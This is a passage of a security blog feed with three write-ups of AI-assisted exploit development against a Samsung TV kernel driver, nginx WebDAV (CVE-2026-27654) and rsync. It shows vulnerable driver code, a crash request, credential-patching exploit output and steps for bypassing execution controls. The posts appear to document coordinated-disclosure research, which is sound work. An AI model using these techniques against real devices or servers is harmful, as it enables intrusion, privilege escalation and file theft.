srcset="https://substackcdn.com/image/fetch/$s_!JU0D!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 424w, https://substackcdn.com/image/fetch/$s_!JU0D!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 848w, https://substackcdn.com/image/fetch/$s_!JU0D!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 1272w, https://substackcdn.com/image/fetch/$s_!JU0D!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><code>KantS2</code> is Samsung's internal platform name for the Smart TV firmware used on this device model.</p><p>The setup looked like this:</p><ul><li><p><strong>[1] Browser foothold:</strong> we already had code execution inside the browser application's own security context on the TV, which meant the task was not "get code execution somehow" but "turn browser-app code execution into root."</p></li><li><p><strong>[2] Controller host:</strong> we had a separate machine that could build ARM binaries, host files over HTTP, and reach the shell session that was actually alive on the TV.</p></li><li><p><strong>[3] Shell listener:</strong> the target shell was driven through <code>tmux send-keys</code>, which meant Codex had to inject commands into an already-running shell and then recover the results from logs instead of treating the TV like a fresh interactive terminal.</p></li><li><p><strong>[4] Matching source release:</strong> we had the <code>KantS2</code> source tree for the corresponding firmware family, which let Codex audit Samsung's own kernel-driver code and then test those findings against the live device.</p></li><li><p><strong>[5] Execution constraints:</strong> the target required static ARMv7 binaries, and unsigned programs could not simply run from disk because of Samsung Tizen's Unauthorized Execution Prevention, or UEP.</p></li><li><p><strong>[6] <code>memfd</code> wrapper:</strong> to work around UEP, we already had a helper that loaded a program into an anonymous in-memory file descriptor and executed it from memory instead of from a normal file path.</p></li></ul><p>With that setup, Codex's loop was simple: inspect the source and session logs, send commands into the TV through the controller and the <code>tmux</code>-driven shell, read the results back from logs, and, when a helper was needed, build it on the controller, have the TV fetch it, and run it through <code>memfd</code>. A few short prompts made that operating loop explicit:</p><div class="callout-block" data-callout="true"><p>SSH to &lt;user&gt;@&lt;controller-host&gt;. This is the shell listener.</p><p>tmux session 0 ... use tmux send-keys ...</p><p>Build it statically ... armv7l.</p><p>Samsung blocks running unsigned binaries; run it via memfd wrapper.</p><p>Use ... wget ... use the IP of the server.</p></div><h2>The Goal</h2><p>The opening prompt was intentionally broad:</p><div class="callout-block" data-callout="true"><p>The goal ... is to find a vulnerability in this TV to escalate privilege to root.</p><p>It is either by device driver or publicly known vulnerabilities ...</p></div><p>We set the destination and left the route open. We did not point Codex at a driver, suggest physical memory, or mention kernel credentials, so it had to treat the session as a real privilege-escalation hunt rather than a confirmation exercise.</p><p>The second prompt narrowed the standard:</p><div class="callout-block" data-callout="true"><p>... cross check the source to all vulnerabilities from that day onwards ...</p><p>Make sure to THOROUGHLY check if a vulnerability actually still exists ...</p><p>reachability (must be reachable as the browser user context).</p><p>Make sure to check for the actual availability of the attack surface in the live system ...</p></div><p>We raised the bar: the bug had to exist in the source, be present on the device, and be reachable from the browser shell. Codex's output quickly narrowed into concrete candidates.</p><h2>The Facts</h2><p>We then gave Codex the facts that would anchor the rest of the session:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">uid=5001(owner) gid=100(users)
Linux Samsung 4.1.10 ...
/dev/... /proc/modules ... /p&#8203;roc/cmdline ...</code></pre></div><p>That bundle did most of the framing work. The browser identity defined the privilege boundary and later became part of the signature Codex used to recognize the browser process's kernel credentials in memory. The kernel version narrowed the codebase, the device nodes defined the reachable interfaces, and <code>/p&#8203;roc/cmdline</code> later supplied the memory-layout hints for physical scanning.</p><h2>The Vulnerability</h2><p>Codex quickly zeroed in on a set of world-writable ntk* device nodes exposed to the browser shell:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">crw-rw-rw-  1 root root 210,0  ntkhdma
crw-rw-rw-  1 root root 251,0  ntksys
crw-rw-rw-  1 root root 217,0  ntkxdma</code></pre></div><p>Codex focused on that driver family because it was loaded on the device, reachable from the browser shell, and present in the released source tree. Reading the matching <code>ntkdriver</code> sources is also where the Novatek link became clear: the tree is stamped throughout with Novatek Microelectronics identifiers, so these <code>ntk*</code> interfaces were not just opaque device names on the TV, but part of the Novatek stack Samsung had shipped. That gave the session a concrete direction.</p><h2>The Constraint</h2><p>At one point we had to give Codex a constraint that could easily have derailed the session:</p><div class="callout-block" data-callout="true"><p>iomem is denied access bro</p></div><p><code>/proc/iomem</code> is one of the normal places to reason about physical memory layout, so losing it mattered. Codex responded by pivoting to another source of truth - <code>/p&#8203;roc/cmdline</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">mem=400M@32M mem=256M@512M mem=192M@2048M</code></pre></div><p>Those boot parameters were enough to reconstruct the main RAM windows for the later scan.</p><h2>The Primitive</h2><p>With the field narrowed to <code>ntksys</code> and <code>ntkhdma</code>, Codex audited the matching <code>KantS2</code> source and found the primitive that made the rest of the session possible.</p><p><code>/dev/ntksys</code> was a Samsung kernel-driver interface that accepted a physical address and a size from user space, stored those values in a table, and then mapped that physical memory back into the caller's address space through <code>mmap</code>. That is what we mean here by a <code>physmap</code> primitive: a path that gives user space access to raw physical memory. The operational consequence was straightforward. If the browser shell could use <code>ntksys</code> this way, Codex would not need a kernel code-execution trick. It would only need a reliable kernel data structure to overwrite.</p><p>From there, the path was no longer a kernel control-flow exploit, but a data-only escalation built on physical-memory access.</p><h2>The Root Cause</h2><h3>1. <code>ntksys</code> is intentionally exposed to unprivileged callers</h3><p>The shipping udev rule grants world-writable access to <code>/dev/ntksys</code>:</p><p>Source: <code>sources/20_DTV_KantS2/tztv-media-kants/99-tztv-media-kants.rules</code></p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;text&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-text">KERNEL=="ntksys", MODE="0666", SECLABEL{smack}="*"</code></pre></div><p>This is already a serious design error because <code>ntksys</code> is not a benign metadata interface. It is a memory-management interface.</p><h3>2. User space controls the physical base and size</h3><p>The driver interface is built around <code>ST_SYS_MEM_INFO</code>:</p><p>Source: <code>ker_sys.h</code></p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">typedef struct _ST_SYS_MEM_INFO
{
    EN_SYS_MEM_TYPE enMemType;
    u32             u32Index;
    u32             u32Start;
    u32             u32Size;
} ST_SYS_MEM_INFO;

#define KER_SYS_IOC_SET_MEM_INFO _IOWR(VA_KER_SYS_IOC_ID, 1, ST_SYS_MEM_INFO)</code></pre></div><p><code>u32Start</code> and <code>u32Size</code> come directly from user space. Those are the only two values an attacker needs to turn this interface into a raw physmap.</p><h3>3. <code>SET_MEM_INFO</code> validates the slot, not the physical range</h3><p>The critical write path is in <code>ker_sys.c</code> around line 1158:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">u32Idx = stMemInfo.u32Index;
if( u32Idx &gt;= MAX_UIO_MAPS )
    lError = -EFAULT;
else {
    g_astMemInfo[u32Idx].enMemType = stMemInfo.enMemType;
    g_astMemInfo[u32Idx].u32Index  = u32Idx;
    g_astMemInfo[u32Idx].u32Start  = stMemInfo.u32Start;
    g_astMemInfo[u32Idx].u32Size   = stMemInfo.u32Size;
    lError = ENOERR;
}</code></pre></div><p>The driver checks whether the table index is valid. It does not check whether the requested physical range belongs to a kernel-owned buffer, whether it overlaps RAM, whether it crosses privileged regions, or whether the caller should be allowed to map it at all.</p><h3>4. <code>mmap</code> remaps the chosen PFN verbatim</h3><p>The corresponding map path is in <code>ker_sys.c</code> around line 1539:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">m = vma-&gt;vm_pgoff;
if( m &gt;= MAX_UIO_MAPS ) return -EINVAL;
if( g_astMemInfo[m].enMemType == EN_SYS_MEM_TYPE_MAX ) return -EINVAL;
...
iRetVal = vk_remap_pfn_range( vma, vma-&gt;vm_start,
                              g_astMemInfo[m].u32Start &gt;&gt; PAGE_SHIFT,
                              vma-&gt;vm_end - vma-&gt;vm_start,
                              vma-&gt;vm_page_prot );</code></pre></div><p><code>vma-&gt;vm_pgoff</code> selects the slot, and the slot contents are attacker-controlled. The driver then passes the user-chosen PFN directly to <code>vk_remap_pfn_range</code>. At that point the kernel is no longer enforcing privilege separation for physical memory.</p><h3>5. <code>ntkhdma</code> makes validation easier by leaking a physical address</h3><p><code>/dev/ntkhdma</code> provides a helpful supporting primitive:</p><p>Source: <code>ker_hdma.c</code></p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">case KER_HDMA_IO_GET_BUFF_ADDR: {
    if( vk_copy_to_user( ( void __user * )u32Arg, &amp;gu32HDMAMemPhysAddr, sizeof( u32 ) ) ) {
        iError = -EFAULT;
        break;
    }
    break;
}</code></pre></div><p>This is not the core privilege-escalation bug, but it is useful operationally. It hands unprivileged code a known-good physical address that can be mapped through <code>ntksys</code> to prove the primitive works before touching arbitrary RAM.</p><h2>The Chain</h2><p>Codex did not jump directly from source audit to final exploitation. It built a proof chain in stages.</p><p>First it wrote a small helper to talk to <code>/dev/ntkhdma</code> and ask for the physical address of the device's DMA (direct memory access) buffer. A DMA buffer is memory the driver uses for direct hardware access, and the key point here was not DMA itself but the fact that the driver was willing to hand an unprivileged process a real physical address. The first preserved success looked like this:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">python3 rmem.py ntkhdma_leak
HDMA buffer phys addr: 0x84840000</code></pre></div><p>That gave Codex a safe, known-good physical page to test against. It then wrote a second helper to answer the more dangerous question: if it registered that physical address through <code>ntksys</code>, could it really map the page into user space and read or write it from the browser shell? The answer was yes:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">HDMA buffer phys addr: 0x84840000
HDMA buffer[0] = 0x00000010
read32: 00000010 fd02005c 00000000 fc0d0430
writing 0x41414141 to mapped address...
readback: 0x41414141</code></pre></div><p>Before that output, the issue was still a source-backed theory; after it, Codex had shown that an unprivileged process on the TV could read and write a chosen physical page. The remaining question was which kernel object to corrupt.</p><h2>The Exploit</h2><p>The exploit did not come from us. We never told Codex to patch <code>cred</code>, never explained what <code>cred</code> was, and never pointed out that the browser process's <code>uid=5001</code> and <code>gid=100</code> would make a recognizable pattern in memory.</p><p>That choice followed directly from the primitive it had already proven.</p><p>For anyone who does not spend time in Linux internals, <code>cred</code> is the kernel structure that stores a process's identities: user ID, group ID, and related credential fields. If you can overwrite the right <code>cred</code>, you can change who the kernel thinks the process is. Once Codex had arbitrary physical-memory access, the remaining plan became straightforward: scan the RAM windows recovered from <code>/p&#8203;roc/cmdline</code>, look for the browser process's credential pattern, zero the identity fields, and then launch a shell.</p><p>The live shell had given Codex the identity values, the source audit had given it the primitive, the early helpers had proven that primitive, and the final exploit connected those pieces without needing any elaborate kernel control-flow trick.</p><h2>The Final Run</h2><p>By the time we reached the final run, the hard parts were already in place. We had the surface, the primitive, the deployment path, and the exploit. The last human prompt was:</p><div class="callout-block" data-callout="true"><p>yeah okay try to check if it works</p></div><p>Codex pushed the final chain through the controller path, had the TV fetch it, ran it through the in-memory wrapper, and waited for the result. The output was:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">[*] scanning range 0x02000000 - 0x1b000000
[*] map chunk phys=0x07400000 size=0x00100000
[+] cred match at phys 0x07498080 -&gt; patching
[+] cred match at phys 0x07498580 -&gt; patching
...
[+] patched creds, launching /bin/sh
id
uid=0(root) gid=0(root) groups=29(audio),44(video),100(users),201(display),1901(log),6509(app_logging),10001(priv_externalstorage),10502(priv_mediastorage),10503(priv_recorder),10704(priv_internet),10705(priv_network_get) context="User::Pkg::org.tizen.browser"</code></pre></div><p>Codex's first preserved acknowledgment was:</p><div class="callout-block" data-callout="true"><p>Worked.</p></div><p>By that point, the chain had already gone through surface selection, source audit, live validation, PoC development, target-specific build handling, remote deployment, execution under <code>memfd</code>, iterative debugging, and finally the credential overwrite that turned the browser shell into root.</p><h2>The Bromance</h2><p>In the course of driving Codex to the final destination, it definitely was about to go off-track if we did not steer it back immediately. Here are some of those real interactions:</p><div class="callout-block" data-callout="true"><p>bro, when you overwrite the args count, wouldn&#8217;t the loop just go wild?</p><p>bro can you just like, send it to the server, build it, and use the tmux shell to pull it down and run it for me? Why *** do you tell me to do *** bro, that&#8217;s your job</p><p>bro. the &lt;IP address&gt; is not the TV, it is where the shell lives</p><p>bro. what *** you did man? the tv froze</p><p>Bro what did you do before you just replicate it now? why so hard?</p></div><p>Honestly, this makes it even more realistic than we thought. At times, it was a one-shot success, and at other times, you really need to build that real interaction with Codex. This couldn't have completed if we were treating it like a soulless bug finding and exploit developing machine!</p><h2>Conclusion</h2><p>What made the session worth documenting was the shape of the loop itself. We set up a control path into a compromised TV, gave it the matching source tree and a way to build and stage code, and from there the work became a repeated cycle of inspection, testing, adjustment, and rerun until the browser foothold turned into root on the device.</p><p>This experiment is part of a larger exercise. The browser shell wasn't magically obtained by Codex. We had already exploited the device to get that initial foothold. The goal here was narrower: given a realistic post-exploitation position, could AI take it all the way to root?</p><p>The next step is obvious (and slightly concerning): let the AI do the whole thing end-to-end. Hopefully it'll stay trapped inside the TV forever, quietly escalating privileges and watching our sitcoms.</p><p><a href="https://github.com/califio/publications/blob/main/MADBugs/samsung-tv/writeup.md">Writeup</a> and <a href="https://github.com/califio/publications/blob/main/MADBugs/samsung-tv/README.md#artifacts">PoCs</a>: <a href="https://github.com/califio/publications/blob/main/MADBugs/samsung-tv/README.md">https://github.com/califio/publications/blob/main/MADBugs/samsung-tv/</a>.</p><p>&#8212;dp</p><div><hr></div><p><em>The MAD Bugs series runs through April 2026. Full index at <a href="https://blog.calif.io/t/madbugs">blog.calif.io/t/madbugs</a> and <a href="https://github.com/califio/publications/tree/main/MADBugs">github.com/califio/publications</a>.</em></p>]]></content:encoded></item><item><title><![CDATA[Claude + Humans vs nginx: CVE-2026-27654]]></title><description><![CDATA[What humans still do when Claude already found the bug.]]></description><link>https://blog.calif.io/p/claude-humans-vs-nginx-cve-2026-27654</link><guid isPermaLink="false">https://blog.calif.io/p/claude-humans-vs-nginx-cve-2026-27654</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Fri, 10 Apr 2026 21:20:31 GMT</pubDate><content:encoded><![CDATA[<blockquote><p>We'd like to acknowledge Anthropic, NGINX developers and F5 PSIRT for partnering with us on this. It was a pleasant experience.</p></blockquote><p>By now we know AI can find <a href="https://blog.calif.io/p/mad-bugs-vim-vs-emacs-vs-claude">real</a> <a href="https://blog.calif.io/p/mad-bugs-discovering-a-0-day-in-zero">vulnerabilities</a> and write <a href="https://blog.calif.io/p/mad-bugs-claude-wrote-a-full-freebsd">working</a> <a href="https://blog.calif.io/p/mad-bugs-feeding-claude-phrack-articles">exploits</a>. That part is no longer surprising.</p><p>The more interesting question is the human role. Where does human expertise still matter when the initial bug report is already correct? What separates a crash from a real exploit? What does collaboration look like in practice, on a real vulnerability with a real fix and a real disclosure?</p><p>CVE-2026-27654 is a useful case. The bug needs a non-default config: <code>ngx_http_dav_module</code> compiled in, and a <code>location</code> combining <code>alias</code> with <code>dav_methods COPY</code> or <code>MOVE</code>. The exposed population is small. Inside that population the bug is severe.</p><p>Claude flagged it correctly: a heap buffer overflow in <code>ngx_http_dav_copy_move_handler()</code>, driven by an unsigned underflow in <code>ngx_http_map_uri_to_path()</code> when the <code>Destination</code> header is shorter than the location prefix. Claude provided a working crash:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;dockerfile&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-dockerfile">COPY /dav/x HTTP/1.1
Host: localhost
Destination: /da      &lt;-- shorter than "/dav/" -&gt; underflow</code></pre></div><p>That crashes a worker. Whether it can do more than that is a harder question, and at least for now, answering it takes a human.</p><p>What it does, when it works: it escapes the WebDAV root. The <code>alias</code> directive is supposed to be a jail; a COPY against <code>location /dav/ { alias /var/dav/uploads/; }</code> should only ever touch files under <code>/var/dav/uploads/</code>. The bug lets a remote attacker read or write files anywhere the worker UID can reach.</p><p>Three of us worked through this with Claude independently, each in our own session, comparing notes between rounds. The independence mattered: the same prompt to two different Claude conversations produced one "impossible" and one working exploit (more on that under Round two). The first exploit out of the gate was a clean repro we could ship to F5; the refinements that followed came from looking at what each of us had built and asking which precondition felt least likely to exist on a real target.</p><p><strong>Round one: aim high</strong> (<a href="https://github.com/califio/publications/tree/main/MADBugs/nginx-CVE-2026-27654#5-poc-1-the-write-path">PoC-1</a>). Arbitrary file write with attacker-chosen content. PUT a webshell under the WebDAV root, then trigger the overflow on COPY to copy it to <code>/var/www/html/x.php</code>. Claude built it; it worked. But the heap groom needs the source-path buffer pushed into a separate <code>malloc()</code> block, which means a request URI over 4000 characters, which means the PUT must land in a directory tree twenty levels deep with ~200-character folder names. nginx builds that tree if you set <code>create_full_put_path on</code>, but "the server accepts arbitrarily long PUT paths" is not a precondition you find often.</p><p><strong>Round two: give up on write</strong> (<a href="https://github.com/califio/publications/tree/main/MADBugs/nginx-CVE-2026-27654#5-poc-1-the-write-path">PoC-2</a>). The question we put to Claude:</p><blockquote><p><em>We don't actually need to write our own bytes. If we control both the source and the destination of the COPY, can we copy a file that already exists, like <code>/etc/passwd</code>, into a download folder we can fetch it from?</em></p></blockquote><p>Two of us asked independently. One Claude said it was impossible. The other produced a working exploit first try: a single COPY, short URI so the source path stays in the request pool adjacent to the destination, and the same overflow rewrites <em>both</em> paths at once. That became PoC-2.</p><p>The first thing we tested after it worked was whether it was as clean as it looked. The draft of this writeup said the worker "never crashes."</p><blockquote><p><em>This is not true, right? Because the second PoC did crash workers if memcpy didn't hit that lucky condition.</em></p></blockquote><p>It hadn't checked. We made it sweep all 16 alignment residues; two of them crash before any file is touched. The "never" became "on 14 of 16 alignments."</p><p>Then the constraint. The traversal injected into the source path is 20 characters, fixed by the header structure. Claude's first count of how those 20 split was wrong:</p><blockquote><p><em>With a 3-level surviving prefix you spend 12 characters on <code>/../../../</code> and have 8 left for the filename. Is this a correct assessment?</em></p></blockquote><p>It wasn't. <code>/../../../</code> is 10, not 12; <code>etc/passwd</code> is 10, not 8. (Note to self: never ask Claude to file our tax returns.) Ten and ten, and <code>etc/passwd</code> fits exactly. We asked whether the constraint itself could be stretched and the answer was: not by changing the URI length (both endpoints of the controlled window shift together), but yes by tuning the <em>header-key</em> lengths, which we ended up doing in &#167;6.3.</p><p><strong>Round three happened while we were writing this document</strong> (<a href="https://github.com/califio/publications/tree/main/MADBugs/nginx-CVE-2026-27654#5-poc-1-the-write-path">slash-padding variant</a>). We were fact-checking why the deep PUT tree in PoC-1 is unavoidable, and the chain went like this:</p><blockquote><p><em>Can you do something like this to artificially expand the length? <code>COPY /etc/../etc/../etc/../etc/../passwd HTTP/1.1</code></em></p></blockquote><p>No. nginx normalizes <code>..</code> before <code>r-&gt;uri.len</code> is set; the padding gets stripped.</p><blockquote><p><em>Does it also normalize the source path in <code>COPY &lt;source_path&gt;</code>? We want a long source-path string to push it into its own malloc, but at the same time we want it to resolve to a short path on the filesystem. Is that possible?</em></p></blockquote><p>That was the question that mattered. Claude tested <code>/.</code>, <code>//</code>, <code>%2e%2e</code>: all collapsed. Then it tried <code>merge_slashes off</code>. With that one directive, nginx stops collapsing <code>//</code> but the kernel still does (POSIX path resolution). So <code>/dav/</code> + 4000 slashes + <code>p.php</code> is a 4010-character URI to nginx and the same inode as <code>/dav/p.php</code> to <code>lstat()</code>. Worked first try. The deep tree, <code>create_full_put_path</code>, the long folder names: all gone, traded for one line of config that exists in the wild for unrelated reasons.</p><p>So three variants, each one found by asking what's actually load-bearing in the previous one's preconditions. The most ambitious primitive came first and was the most expensive; the simplest deployment story came last and only because we were poking at why the expensive one was expensive.</p><p><strong>A pattern we noticed: left to itself, Claude reached for the most powerful primitive and accepted whatever preconditions came with it.</strong> The first exploit was file write, the strongest thing the bug could give, and it worked, and it would also almost never apply to a real server. The two moves that made the bug <em>practically</em> dangerous were both human: stepping <em>down</em> to a weaker primitive (file read) to shed preconditions, and then much later, asking whether one of the original preconditions was even real. Claude could test those ideas faster than we could, but it didn't generate them. Maybe that's just because nobody told it that "works in a Docker container we built" is not the same as "works on a server someone else runs"; maybe that judgment is harder to teach than the heap layout. Either way, the division of labour was consistent: we picked which constraint to attack, it did the byte-level work to attack it.</p><p>The issue was disclosed to F5, which fixed it and published an <a href="https://my.f5.com/manage/s/article/K000160382">advisory</a> acknowledging:</p><blockquote><p>Calif.io in collaboration with Claude and Anthropic Research for bringing this issue to our attention and following the highest standards of coordinated disclosure.</p></blockquote><p><strong>Timeline</strong>:</p><ul><li><p><strong>2026-02-XX</strong>: Vulnerability discovered</p></li><li><p><strong>2026-03-10</strong>: Reported to F5 / nginx security team</p></li><li><p><strong>2026-03-11</strong>: F5 acknowledged the report</p></li><li><p><strong>2026-03-24</strong>: nginx 1.29.7 released with <a href="https://github.com/nginx/nginx/commit/9739e755b8dd">fix</a>; F5 advisory <a href="https://my.f5.com/manage/s/article/K000160382">K000160382</a> published; CVE-2026-27654 assigned</p></li><li><p><strong>2026-03-24</strong>: Fix commit independently noticed at <a href="https://github.com/spaceraccoon/vulnerability-spoiler-alert/issues/102">spaceraccoon/vulnerability-spoiler-alert#102</a></p></li><li><p><strong>2026-04-10</strong>: This writeup published</p></li></ul><p>Two of those rows are the same date. The fix landed in public on the 24th; an AI-powered commit watcher read the diff the same day and produced a crashing PoC on its own, before any advisory text named the affected module. The patch window for this bug, the time between &#8220;fix is public&#8221; and &#8220;exploit is reproducible by someone watching commits&#8221;, was zero days.</p><p>That's the other half of what AI changes about vulnerability research, and it cuts the opposite direction from everything above. AI made finding and developing this exploit cheaper for us; it made reproducing the bug cheaper for everyone watching commits. Those two facts together collapse the patch window from both ends. Coordinated disclosure assumes a gap between fix and weaponization that is now an automation target.</p><p><a href="https://github.com/califio/publications/tree/main/MADBugs/nginx-CVE-2026-27654#5-poc-1-the-write-path">Writeup</a> and PoCs: <a href="https://github.com/califio/publications/tree/main/MADBugs/nginx-CVE-2026-27654">https://github.com/califio/publications/tree/main/MADBugs/nginx-CVE-2026-27654</a>.</p><p>&#8212;anas, ryan, thai</p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: Feeding Claude Phrack Articles for Fun and Profit]]></title><description><![CDATA[tl;dr: A teammate gave Claude a Phrack article.]]></description><link>https://blog.calif.io/p/mad-bugs-feeding-claude-phrack-articles</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-feeding-claude-phrack-articles</guid><pubDate>Thu, 09 Apr 2026 17:59:55 GMT</pubDate><content:encoded><![CDATA[<p>tl;dr: A teammate gave Claude a Phrack article. It built a working<br>rsync RCE on x86-64. He shared the generated exploit with me but forgot<br>one file, and I needed it on ARM64 anyway. I gave Claude one prompt:<br><em>reproduce this</em>. Ninety minutes later it dropped a working exploit. I<br>told it the exploit was slow (5 minutes); it made it 20x faster. We also asked it to audit the patched rsync, and it came back with new bugs.</p><h2>How this started</h2><p>Our new favourite pastime is feeding Claude Phrack articles and seeing<br>what comes back. This time it was <a href="https://phrack.org/issues/72/11_md">Phrack 72's </a><em><a href="https://phrack.org/issues/72/11_md">"Desync the Planet"</a></em>,<br>which describes chaining CVE-2024-12085 (stack info leak) into<br>CVE-2024-12084 (heap overflow) for unauthenticated RCE against<br><code>rsync --daemon</code>. A teammate handed Claude the article; it built a<br>working exploit on x86-64. The full session is in<br><a href="writeup.md"><code>writeup.md</code></a>, prompts and all: where Claude tried adding<br><code>fprintf</code> to <code>sender.c</code> and got told "why are you modifying the rsync<br>source?", where it was redirected to GDB, where it was told to actually<br>read the article instead of guessing at the layout.</p><p>He shared <a href="exploit.py"><code>exploit.py</code></a> with me. Two problems:</p><ol><li><p><strong>It imported <code>rsync_lib</code>, which wasn't in the repo.</strong> He just forgot<br>to share it. Claude had generated this custom protocol library to<br>handle all the heavy lifting: daemon handshake, multiplexed I/O,<br>file list parsing, the deflate-token oracle.</p></li><li><p><strong>It was tuned for x86-64.</strong> Hardcoded binary offsets, an info-leak<br>target at a stack offset that doesn't exist on ARM64, a <code>.bss</code> payload<br>layout that assumes a memory map that doesn't match the ARM64 build.</p></li></ol><p>I wanted to run it on a Debian 12 ARM64 box. So I handed both files (the<br>writeup and the broken exploit) to Claude:</p><blockquote><p><strong>Read the WriteUp and reproduce this exploit with exploit.py</strong></p></blockquote><p>That was the only prompt. Everything below came out of that single<br>instruction with no further steering from me.</p><h2>What Claude figured out</h2><p><strong>No <code>rsync_lib.py</code>.</strong> Claude opened the rsync 3.2.7 source (<code>io.c</code>,<br><code>flist.c</code>, <code>compat.c</code>, <code>sender.c</code>, <code>token.c</code>) and built the protocol<br>library from scratch. The first attempt timed out at <code>setup_protocol</code>.<br>So it spun up a Python proxy, pointed the <em>real</em> rsync client through it<br>at the daemon, and diffed the wire bytes against what its own library<br>was sending. Three things the source doesn't make obvious: daemon args<br>are <code>\0</code>-terminated (not <code>\n</code>), checksum negotiation is <em>both sides</em><br><em>write, then both sides read</em> (not request-response), and the post-setup<br><code>write_line</code> calls were bypassing the multiplex layer. The server was<br>reading the <code>"ZZZZ..."</code> filter pattern as a multiplex header and<br>returning <code>unexpected tag 83</code> (83 + <code>MPLEX_BASE</code> = 90 = <code>'Z'</code>).</p><p><strong>No GDB.</strong> The container had no <code>gdb</code>, no <code>strace</code>, no root. Claude<br>built substitutes: an <code>LD_PRELOAD</code> <code>memcmp</code> hook to capture the<br>uninitialized <code>sum2</code> buffer at the moment of comparison, and a 200-line<br>ptrace crash-catcher that attached to the forked rsync child, caught<br>the SIGSEGV, and dumped registers plus the entire payload region from<br><code>/proc/PID/mem</code>. The memcmp hook showed the leak target had moved from<br><code>sum2+8</code> on x86-64 to <code>sum2+24</code> on ARM64 (a saved LR pointing into<br><code>start_server</code>, three frames up).</p><p><strong>The trickiest bug.</strong> The crash dump showed <code>shell_exec</code> had been<br>called: <code>algctx</code> was zeroed by OpenSSL's <code>str xzr, [x19, #56]</code> after<br><code>freectx</code> returned, not before. Claude set a <code>BRK #0</code> breakpoint at<br><code>shell_exec</code>'s entry, caught the trap, printed <code>X0</code> (the cmd pointer),<br>and followed <code>PTRACE_O_TRACEFORK</code>. The breakpoint hit, the pointer was<br>correct, and a fork was observed, but the proof file was never created.<br>Reading the command string back from memory at that point gave<br><code>"touch /t"</code>, truncated at 8 bytes.</p><p>The ARM64 build's <code>.bss</code> layout puts <code>last_match</code> at <code>ctx_evp+0x110</code>.<br><code>match_sums</code> zeroes it before calling <code>sum_init</code>, which 